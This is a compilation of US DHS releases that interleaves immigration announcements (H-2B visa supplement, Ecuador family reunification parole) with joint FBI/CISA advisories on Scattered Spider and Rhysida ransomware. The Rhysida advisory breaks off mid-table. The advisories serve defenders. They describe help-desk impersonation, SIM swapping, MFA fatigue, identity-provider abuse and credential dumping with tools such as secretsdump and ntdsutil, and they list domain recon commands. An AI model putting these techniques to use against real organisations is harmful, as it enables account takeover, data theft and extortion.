WASHINGTON – Today, the Department of Homeland Security (DHS), through the U.S. Citizenship and Immigration Services (USCIS), and the Department of Labor (DOL) published a temporary final rule making available an additional 64,716 H-2B temporary nonagricultural worker visas for fiscal year (FY) 2024, on top of the statutory cap of 66,000 H-2B visas that are available each fiscal year. American businesses in industries such as hospitality and tourism, landscaping, seafood processing, and more turn to seasonal and other temporary workers in the H-2B program to help them meet demand from consumers. The supplemental visa allocation will help address the need for these workers in areas where too few U.S. workers are available, helping contribute to the American economy. The temporary final rule also advances the Biden Administration’s pledge, under the Los Angeles Declaration for Migration and Protection, to expand lawful pathways as an alternative to irregular migration.  

By making these supplemental visas available at the outset of FY 2024, the Departments will help ensure U.S. businesses with workforce needs are able to plan ahead and find the seasonal and temporary workers they need. At the same time, DHS and DOL are reinforcing robust protections for U.S. and foreign workers alike, including by ensuring that employers first seek out and recruit American workers for the jobs to be filled, as the H-2B program requires, and that foreign workers hired are protected from unscrupulous employers. Recently, both DHS and DOL proposed regulations to further strengthen worker protections in the H-2A and H-2B visa programs, and the White House-led H-2B Worker Protection Taskforce released a report (PDF) detailing new actions to be taken by Federal agencies to strengthen protections for vulnerable H-2B and similarly situated U.S. workers. 

The H-2B supplemental includes an allocation of 20,000 visas to workers from Colombia, Costa Rica, Ecuador, El Salvador, Guatemala, Haiti, and Honduras. This country-specific allocation is part of the Biden-Harris Administration’s efforts to build a safe, orderly, and humane immigration system that includes expanding lawful pathways for migration while strengthening consequences for those without a legal basis to remain in the United States. 
 
In addition to the 20,000 country-specific allocation, 44,716 supplemental visas will be available to returning workers who received H-2B visas or were otherwise granted H-2B status during one of the last three fiscal years. The rule allocates these supplemental visas for returning workers between the first half and second half of the fiscal year to account for the need for additional seasonal and other temporary workers over the course of the year, with a portion of the second half allocation reserved to meet the demand for workers during the summer season. The semiannual cap of 33,000 H-2B visas authorized under the Immigration and Nationality Act (statutory cap) for the first half of FY 2024 was reached on October 11, 2023.

The supplemental H-2B visas have been divided into the following allocations:

  • First half of FY 2024 (October 1 to March 31): 20,716 visas are immediately available to returning workers – those who were issued H-2B visas or held H-2B status in FY 2021, FY 2022, or FY 2023, regardless of country of nationality.  These petitions must request employment start dates on or before March 31, 2024.

  • Early second half of FY 2024 (April 1 to May 14): 19,000 visas are limited to returning workers – those who were issued H-2B visas or held H-2B status in FY 2021, FY 2022, or FY 2023, regardless of country of nationality. These early second half of FY 2024 petitions must request employment start dates from April 1, 2024, to May 14, 2024.  

  • Late second half of FY 2024 (May 15 to September 30): 5,000 visas are limited to returning workers – those who were issued H-2B visas or held H-2B status in FY 2021, FY 2022, or FY 2023, regardless of country of nationality. These late second half of FY 2024 petitions must request employment start dates from May 15, 2024, to Sept. 30, 2024.

  • For the entirety of FY 2024: 20,000 visas are reserved for nationals of El Salvador, Guatemala, Honduras, Haiti, Colombia, Ecuador, and Costa Rica, regardless of whether such nationals are returning workers. Employers requesting an employment start date in the first half of FY 2024 may file such petitions immediately after the publication of this temporary final rule.  

The H-2B program permits employers to temporarily hire noncitizens to perform nonagricultural labor or services in the United States. The employment must be of a temporary nature, such as a one-time occurrence, seasonal need, or intermittent need. Employers seeking H-2B workers must take a series of steps to test the U.S. labor market. They must obtain certification from DOL that there are not enough U.S. workers who are able, willing, qualified, and available to perform the temporary work for which they seek a prospective foreign worker, and that employing H-2B workers will not adversely affect the wages and working conditions of similarly employed U.S. workers. The maximum period of stay in H-2B classification is three years. A person who has held H-2B nonimmigrant status for a total of three years must depart and remain outside of the United States for an uninterrupted period of three months before seeking readmission as an H-2B nonimmigrant.

DHS and DOL are committed to protecting all H-2B workers from exploitation and abuse, and to ensuring, consistent with law, that employers do not refuse to hire or appropriately recruit U.S. workers who are able, willing, qualified, and available to perform the temporary work. The temporary final rule implementing this allocation features several provisions to protect both U.S. and H-2B workers.  

Petitions requesting supplemental allocations under this rule must be filed at the USCIS Texas Service Center. Petitions filed under the supplemental allocations in this rule at any location other than the Texas Service Center will be rejected, and the filing fees will be returned. 

Scattered Spider

Source: US Department of Homeland Security

SUMMARY

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.

Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.

The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.

Download the PDF version of this report:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:

  • Posed as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees and gain access to the network [T1598],[T1656].
  • Posed as company IT and/or helpdesk staff to direct employees to run commercial remote access tools enabling initial access [T1204],[T1219],[T1566].
  • Posed as IT staff to convince employees to share their one-time password (OTP), an MFA authentication code.
  • Sent repeated MFA notification prompts leading to employees pressing the “Accept” button (also known as MFA fatigue) [T1621].[5]
  • Convinced cellular carriers to transfer control of a targeted user’s phone number to a SIM card they controlled, gaining control over the phone and access to MFA prompts.
  • Monetized access to victim networks in numerous ways including extortion enabled by ransomware and data theft [T1657].

After gaining access to networks, FBI observed Scattered Spider threat actors using publicly available, legitimate remote access tunneling tools. Table 1 details a list of legitimate tools Scattered Spider, repurposed and used for their criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.

Table 1: Legitimate Tools Used by Scattered Spider

Tool

Intended Use

Fleetdeck.io

Enables remote monitoring and management of systems.

Level.io

Enables remote monitoring and management of systems.

Mimikatz [S0002]

Extracts credentials from a system.

Ngrok [S0508]

Enables remote access to a local web server by tunneling over the internet.

Pulseway

Enables remote monitoring and management of systems.

Screenconnect

Enables remote connections to network devices for management.

Splashtop

Enables remote connections to network devices for management.

Tactical.RMM

Enables remote monitoring and management of systems.

Tailscale

Provides virtual private networks (VPNs) to secure network communications.

Teamviewer

Enables remote connections to network devices for management.

In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.

Table 2: Malware Used by Scattered Spider

Malware

Use

AveMaria (also known as WarZone [S0670])

Enables remote access to a victim’s systems.

Raccoon Stealer

Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data.

VIDAR Stealer

Steals information including login credentials, browser history, cookies, and other data.

Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.

Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002].

Recent Scattered Spider TTPs

New TTP – File Encryption

More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.

Reconnaissance, Resource Development, and Initial Access

Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].

Table 3: Domains Used by Scattered Spider Threat Actors

Domains

victimname-sso[.]com

victimname-servicedesk[.]com

victimname-okta[.]com

In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.

Execution, Persistence, and Privilege Escalation

Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. At this stage, the Scattered Spider threat actors already control the identity provider and then can choose an arbitrary value for this account attribute. As a result, this activity allows the threat actors to perform privileged escalation [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks to take advantage of the tools’ remote-shell capabilities and executing of commands which elevates their access. They also deploy remote monitoring and management (RMM) tools [T1219] to then maintain persistence.

Discovery, Lateral Movement, and Exfiltration

Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].

To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.

Table 4: Reconnaissance

Technique Title

ID

Use

Gather Victim Identity Information

T1589

Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations.

Phishing for Information

T1598

Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network.

Table 5: Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Domains

T1583.001

Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations.

Establish Accounts: Social Media Accounts

T1585.001

Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization.

Table 6: Initial Access

Technique Title

ID

Use

Phishing

T1566

Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access.

Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools.

Phishing (Mobile)

T1660

Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim.

Phishing: Spearphishing Voice

T1566.004

Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens.

Trusted Relationship

T1199

Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations.

Valid Accounts: Domain Accounts

T1078.002

Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization.

Table 7: Execution

Technique Title

ID

Use

Serverless Execution

T1648

Scattered Spider threat actors use ETL tools to collect data in cloud environments.

User Execution

T1204

Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools thereby enabling access to the victim’s network.

Table 8: Persistence

Technique Title

ID

Use

Persistence

TA0003

Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network.

Create Account

T1136

Scattered Spider threat actors create new user identities in the targeted organization.

Modify Authentication Process: Multi-Factor Authentication

T1556.006

Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network.

Valid Accounts

T1078

Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed.

Table 9: Privilege Escalation

Technique Title

ID

Use

Privilege Escalation

TA0004

Scattered Spider threat actors escalate account privileges when on a targeted organization’s network.

Domain Policy Modification: Domain Trust Modification

T1484.002

Scattered Spider threat actors add a federated identify provider to the victim’s SSO tenant and activate automatic account linking.

Table 10: Defense Evasion

Technique Title

ID

Use

Modify Cloud Compute Infrastructure: Create Cloud Instance

T1578.002

Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection.

Impersonation

TA1656

Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victim’s networks.

Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens.

Table 11: Credential Access

Technique Title

ID

Use

Credential Access

TA0006

Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials.

Forge Web Credentials

T1606

Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network.

Multi-Factor Authentication Request Generation

T1621

Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network.

Unsecured Credentials: Credentials in Files

T1552.001

Scattered Spider threat actors search for insecurely stored credentials on victim’s systems.

Unsecured Credentials: Private Keys

T1552.004

Scattered Spider threat actors search for insecurely stored private keys on victim’s systems.

Table 12: Discovery

Technique Title

ID

Use

Discovery

TA0007

Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, infrastructure backups and enumerate AD to identify useful information to support further operations.

Browser Information Discovery

T1217

Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories.

Cloud Service Dashboard

T1538

Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement.

File and Directory Discovery

T1083

Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation.

Remote System Discovery

T1018

Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit.

Steal Web Session Cookie

T1539

Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies.

Table 13: Lateral Movement

Technique Title

ID

Use

Lateral Movement

TA0008

Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence.

Remote Services: Cloud Services

T1021.007

Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection.

Table 14: Collection

Technique Title

ID

Use

Data from Information Repositories: Code Repositories

T1213.003

Scattered Spider threat actors search code repositories for data collection and exfiltration.

Data from Information Repositories: Sharepoint

T1213.002

Scattered Spider threat actors search SharePoint repositories for information.

Data Staged

T1074

Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration.

Email Collection

T1114

Scattered Spider threat actors search victim’s emails to determine if the victim has detected the intrusion and initiated any security response.

Data from Cloud Storage

T1530

Scattered Spider threat actors search data in cloud storage for collection and exfiltration.

Table 15: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools thereby enabling access to and command and control of the victim’s network.

Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network.

Table 16: Exfiltration

Technique Title

ID

Use

Exfiltration

TA0010

Scattered Spider threat actors exfiltrate data from a target network to for data extortion.

Table 17: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption.

Scattered Spider threat actors has been observed encrypting VMware ESXi servers.

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1567.002

Scattered Spider threat actors exfiltrate data to multiple sites including U.S.-based data centers and MEGA[.]NZ.

Financial Theft

T1657

Scattered Spider threat actors monetized access to victim networks in numerous ways including extortion-enabled ransomware and data theft.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
    • Using security software to detect instances of remote access software being loaded only in memory.
    • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
    • Applying recommendations in the Guide to Securing Remote Access Software.
  • Implementing FIDO/WebAuthn authentication or Public Key Infrastructure (PKI)-based MFA. These MFA implementations are resistant to phishing and not suspectable to push bombing or SIM swap attacks, which are techniques known to be used by Scattered Spider actors. See CISA’s fact sheet Implementing Phishing-Resistant MFA for more information.
  • Strictly limit the use of Remote Desktop Protocol (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
    • Require administrator credentials to install software.
  • Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Install, regularly update, and enable real time detection for antivirus software on all hosts.
  • Disable unused ports and protocols [CPG 2.V].
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.
  • Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 4-17).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

FBI and CISA are seeking any information that can be shared, to include a sample ransom note, communications with Scattered Spider group actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, report the incident to the FBI Internet Crime Complaint Center (IC3) at IC3.gov, or CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870).

REFERENCES

[1] MITRE ATT&CK – Scattered Spider
[2] Trellix – Scattered Spider: The Modus Operandi
[3] Crowdstrike – Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies
[4] Crowdstrike – SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security
[5] Malwarebytes – Ransomware group steps up, issues statement over MGM Resorts compromise

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

VERSION HISTORY

November 16, 2023: Initial version.

USCIS Establishes Family Reunification Parole Process for Ecuador

Source: US Department of Homeland Security

Process will allow family members to reunite in the United States while they wait for immigrant visas to become available

WASHINGTON – U.S. Citizenship and Immigration Services (USCIS) today announced a Federal Register notice implementing a new family reunification parole (FRP) process for Ecuador, advancing the Biden-Harris Administration’s successful combination of expanded lawful pathways and strengthened enforcement to reduce irregular migration. The FRP processes promote family unity and are one of the comprehensive measures announced in April to promote safe and orderly migratory pathways, consistent with the objectives in the Los Angeles Declaration on Migration and Protection.

The new FRP process is by invitation only for certain nationals of Ecuador and allows an eligible beneficiary to be considered for parole into the United States on a case-by-case basis while they wait for their family-based immigrant visa to become available. This process is intended to reunite families more quickly and provide an alternative to dangerous irregular migration.

Certain nationals of Ecuador who are beneficiaries of an approved Form I-130, Petition for Alien Relative, may be eligible to be considered for parole under the new FRP processes. Qualifying beneficiaries must be outside the United States, must meet all requirements, including screening and vetting and medical requirements, and must not have already received an immigrant visa.

The process begins with the Department of State issuing an invitation to initiate the process to certain U.S. citizen or lawful permanent resident petitioners whose Form I-130 filed on behalf of an Ecuadorian principal beneficiary has been approved. Beneficiaries waiting for an immigrant visa could include certain children and siblings of U.S. citizens and certain spouses and children of permanent residents. The invited petitioner can then file a request to be a supporter of the beneficiary and eligible family members, who may then be considered for advance travel authorization and parole.

USCIS will begin using Form I-134A, Online Request to be a Supporter and Declaration of Financial Support, for this process on Nov. 17, 2023.

As with all parole requests, under this FRP process for certain nationals of Ecuador, parole will be authorized only on a case-by-case and temporary basis after determining that there are urgent humanitarian or significant public benefit reasons for authorizing parole and that the beneficiary warrants a favorable exercise of discretion. Noncitizens paroled into the United States under this process will generally be considered for parole for up to three years and can request employment authorization while they wait for their immigrant visa to become available. When their immigrant visa becomes available, they may apply to become a lawful permanent resident.

Section 212(d)(5)(A) of the Immigration and Nationality Act provides Secretary of Homeland Security Alejandro N. Mayorkas with the discretionary authority to parole applicants for admission into the United States temporarily on a case-by-case basis for urgent humanitarian or significant public benefit reasons. Previous secretaries have exercised the parole authority to establish other family reunification parole processes administered by USCIS, including the Cuban Family Reunification Parole Program in 2007 and the Haitian Family Reunification Parole Program in 2014. DHS announced new FRP processes for Colombia, El Salvador, Guatemala, and Honduras in July and the modernization of FRP processes for Cuba and Haiti in August.

The Federal Register notice explains the application process and eligibility criteria.

#StopRansomware: Rhysida Ransomware

Source: US Department of Homeland Security

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known Rhysida ransomware IOCs and TTPs identified through investigations as recently as September 2023. Rhysida—an emerging ransomware variant—has predominately been deployed against the education, healthcare, manufacturing, information technology, and government sectors since May 2023. The information in this CSA is derived from related incident response investigations and malware analysis of samples discovered on victim networks.

FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Rhysida ransomware and other ransomware incidents.

Download the PDF version of this report:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the ATT&CK Tactics and Techniques section for tables mapped to the threat actors’ activity.

Overview

Threat actors leveraging Rhysida ransomware are known to impact “targets of opportunity,” including victims in the education, healthcare, manufacturing, information technology, and government sectors. Open source reporting details similarities between Vice Society (DEV-0832)[1] activity and the actors observed deploying Rhysida ransomware. Additionally, open source reporting[2] has confirmed observed instances of Rhysida actors operating in a ransomware-as-a-service (RaaS) capacity, where ransomware tools and infrastructure are leased out in a profit-sharing model. Any ransoms paid are then split between the group and the affiliates.

For additional information on Vice Society actors and associated activity, see the joint CSA #StopRansomware: Vice Society.

Initial Access

Rhysida actors have been observed leveraging external-facing remote services to initially access and persist within a network. Remote services, such as virtual private networks (VPNs), allow users to connect to internal enterprise network resources from external locations. Rhysida actors have commonly been observed authenticating to internal VPN access points with compromised valid credentials [T1078], notably due to organizations lacking MFA enabled by default. Additionally, actors have been observed exploiting Zerologon (CVE-2020-1472)—a critical elevation of privileges vulnerability in Microsoft’s Netlogon Remote Protocol [T1190]—as well as conducting successful phishing attempts [T1566]. Note: Microsoft released a patch for CVE-2020-1472 on August 11, 2020.[3]

Living off the Land

Analysis identified Rhysida actors using living off the land techniques, such as creating Remote Desktop Protocol (RDP) connections for lateral movement [T1021.001], establishing VPN access, and utilizing PowerShell [T1059.001]. Living off the land techniques include using native (built into the operating system) network administration tools to perform operations. This allows the actors to evade detection by blending in with normal Windows systems and network activities.

Ipconfig [T1016], whoami [T1033], nltest [T1482], and several net commands have been used to enumerate victim environments and gather information about domains. In one instance of using compromised credentials, actors leveraged net commands within PowerShell to identify logged-in users and performed reconnaissance on network accounts within the victim environment. Note: The following commands were not performed in the exact order listed.

  • net user [username] /domain [T1087.002]
  • net group “domain computers” /domain [T1018]
  • net group “domain admins” /domain [T1069.002]
  • net localgroup administrators [T1069.001]

Analysis of the master file table (MFT)[4] identified the victim system generated the ntuser.dat registry hive, which was created when the compromised user logged in to the system for the first time. This was considered anomalous due to the baseline of normal activity for that particular user and system. Note: The MFT resides within the New Technology File System (NTFS) and houses information about a file including its size, time and date stamps, permissions, and data content.

Leveraged Tools

Table 1 lists legitimate tools Rhysida actors have repurposed for their operations. The legitimate tools listed in this joint CSA are all publicly available. Use of these tools should not be attributed as malicious without analytical evidence to support they are used at the direction of or controlled by threat actors.

Disclaimer: Organizations are encouraged to investigate and vet use of these tools prior to performing remediation actions.

Table 1: Tools Leveraged by Rhysida Actors

Name

Description

cmd.exe

The native command line prompt utility.

PowerShell.exe

A native command line tool used to start a Windows PowerShell session in a Command Prompt window.

PsExec.exe

A tool included in the PsTools suite used to execute processes remotely. Rhysida actors heavily leveraged this tool for lateral movement and remote execution.

mstsc.exe

A native tool that establishes an RDP connection to a host.

PuTTY.exe

Rhysida actors have been observed creating Secure Shell (SSH) PuTTy connections for lateral movement. In one example, analysis of PowerShell console host history for a compromised user account revealed Rhysida actors leveraged PuTTy to remotely connect to systems via SSH [T1021.004].

PortStarter

A back door script written in Go that provides functionality for modifying firewall settings and opening ports to pre-configured command and control (C2) servers.[1]

secretsdump

A script used to extract credentials and other confidential information from a system. Rhysida actors have been observed using this for NTDS dumping [T1003.003] in various instances.

ntdsutil.exe

A standard Windows tool used to interact with the NTDS database. Rhysida actors used this tool to extract and dump the NTDS.dit database from the domain controller containing hashes for all Active Directory (AD) users.

Note: It is strongly recommended that organizations conduct domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised.

AnyDesk

A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.

wevtutil.exe

